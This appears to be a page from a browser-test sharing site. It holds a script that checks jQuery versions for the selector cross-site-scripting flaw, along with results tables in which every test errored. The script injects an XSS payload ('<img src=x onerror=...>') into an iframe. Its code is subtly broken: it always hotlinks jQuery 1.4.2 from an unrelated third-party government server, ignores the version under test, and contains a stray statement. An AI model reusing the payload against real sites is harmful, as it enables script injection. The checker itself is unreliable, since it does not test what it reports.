123

123

By
py31j2h 0 Seen 124 times
Tags
123
Run this test now.

Results


Tested on
Chrome - 66 - Windows 10
jQuery VersionIs it Vulnerable?
2.0.3Some Error Occured
2.0.2Some Error Occured
2.0.1Some Error Occured
2.0.0Some Error Occured
1.10.2Some Error Occured
1.10.1Some Error Occured
1.10.0Some Error Occured
1.9.1Some Error Occured
1.9.0Some Error Occured
1.8.3Some Error Occured
1.8.2Some Error Occured
1.8.1Some Error Occured
1.8.0Some Error Occured
1.7.2Some Error Occured
1.7.1Some Error Occured
1.7.0Some Error Occured
1.6.4Some Error Occured
1.6.3Some Error Occured
1.6.2Some Error Occured
1.6.1Some Error Occured
1.6.0Some Error Occured
1.5.2Some Error Occured
1.5.1Some Error Occured
1.5.0Some Error Occured
1.4.4Some Error Occured
1.4.3Some Error Occured
1.4.2Some Error Occured
1.4.1Some Error Occured
1.4.0Some Error Occured
1.3.2Some Error Occured
1.3.1Some Error Occured
1.3.0Some Error Occured
1.2.6Some Error Occured
1.2.3Some Error Occured

Tested on
Chrome Mobile - 41 - Android
jQuery VersionIs it Vulnerable?
2.0.3Some Error Occured
2.0.2Some Error Occured
2.0.1Some Error Occured
2.0.0Some Error Occured
1.10.2Some Error Occured
1.10.1Some Error Occured
1.10.0Some Error Occured
1.9.1Some Error Occured
1.9.0Some Error Occured
1.8.3Some Error Occured
1.8.2Some Error Occured
1.8.1Some Error Occured
1.8.0Some Error Occured
1.7.2Some Error Occured
1.7.1Some Error Occured
1.7.0Some Error Occured
1.6.4Some Error Occured
1.6.3Some Error Occured
1.6.2Some Error Occured
1.6.1Some Error Occured
1.6.0Some Error Occured
1.5.2Some Error Occured
1.5.1Some Error Occured
1.5.0Some Error Occured
1.4.4Some Error Occured
1.4.3Some Error Occured
1.4.2Some Error Occured
1.4.1Some Error Occured
1.4.0Some Error Occured
1.3.2Some Error Occured
1.3.1Some Error Occured
1.3.0Some Error Occured
1.2.6Some Error Occured
1.2.3Some Error Occured

Tested on
Googlebot - 2.1 - undefined
jQuery VersionIs it Vulnerable?
2.0.3Some Error Occured
2.0.2Some Error Occured
2.0.1Some Error Occured
2.0.0Some Error Occured
1.10.2Some Error Occured
1.10.1Some Error Occured
1.10.0Some Error Occured
1.9.1Some Error Occured
1.9.0Some Error Occured
1.8.3Some Error Occured
1.8.2Some Error Occured
1.8.1Some Error Occured
1.8.0Some Error Occured
1.7.2Some Error Occured
1.7.1Some Error Occured
1.7.0Some Error Occured
1.6.4Some Error Occured
1.6.3Some Error Occured
1.6.2Some Error Occured
1.6.1Some Error Occured
1.6.0Some Error Occured
1.5.2Some Error Occured
1.5.1Some Error Occured
1.5.0Some Error Occured
1.4.4Some Error Occured
1.4.3Some Error Occured
1.4.2Some Error Occured
1.4.1Some Error Occured
1.4.0Some Error Occured
1.3.2Some Error Occured
1.3.1Some Error Occured
1.3.0Some Error Occured
1.2.6Some Error Occured
1.2.3Some Error Occured

User Script (ENUM_FUNCTION)

					
// Custom Functions
var jQuery_version = '';
function vulnerable(){
    addError('jQuery '+ jQuery_version, '<b>Vulnerable</b>');
}

function safe(){
    addSuccess('jQuery '+ jQuery_version, 'Safe');
}
    
function removeIframe(){
    var x = document.getElementById('jQueryFrameID');
    x.parentNode.removeChild(x);
}

// Test Function
function test(data){
	// We need to separate properties and access one by one.
try{
    jQuery_version = data;
    var jQueryFrame = document.createElement('iframe');
    jQueryFrame.id = 'jQueryFrameID';
    jQueryFrame.onload = function(){
            var jQueryScript = jQueryFrame.contentWindow.document.createElement('script');
            jQueryScript.type = 'text/javascript';data.toString()
            jQueryScript.src = 'http://www.ah-l-tax.gov.cn/portal/templetlib/2016/images/jquery-1.4.2.js';
            jQueryFrame.contentWindow.document.body.appendChild(jQueryScript);
            jQueryScript.onload = function(){
                var exploitScript = "try{function bad(){parent.vulnerable(); parent.removeIframe();} $('. <img src=x onerror=bad();>');} catch(err){parent.safe();parent.removeIframe();}";
                var exploit = jQueryFrame.contentWindow.document.createElement('script');
                exploit.type = 'text/javascript';
                exploit.innerHTML = exploitScript;
                jQueryFrame.contentWindow.document.body.appendChild(exploit);
                
            };
            jQueryScript.onerror = function(){
                addResult(data ,  'Some Error Occured');
            }
    };
    document.body.appendChild(jQueryFrame);

}

catch(err){
	addInfo(data ,  'Some Error Occured');
}

}
					
				
					
				

Enum Data (ENUM_FUNCTION)

					
// Taken from jQuery Versions Under, https://developers.google.com/speed/libraries/devguide#jquery
var data = ['2.0.3', '2.0.2', '2.0.1', '2.0.0', '1.10.2', '1.10.1', 
'1.10.0', '1.9.1', '1.9.0', '1.8.3', '1.8.2', '1.8.1', '1.8.0', 
'1.7.2', '1.7.1', '1.7.0', '1.6.4', '1.6.3', '1.6.2', '1.6.1', 
'1.6.0', '1.5.2', '1.5.1', '1.5.0', '1.4.4', '1.4.3', '1.4.2', 
'1.4.1', '1.4.0', '1.3.2', '1.3.1', '1.3.0', '1.2.6', '1.2.3'];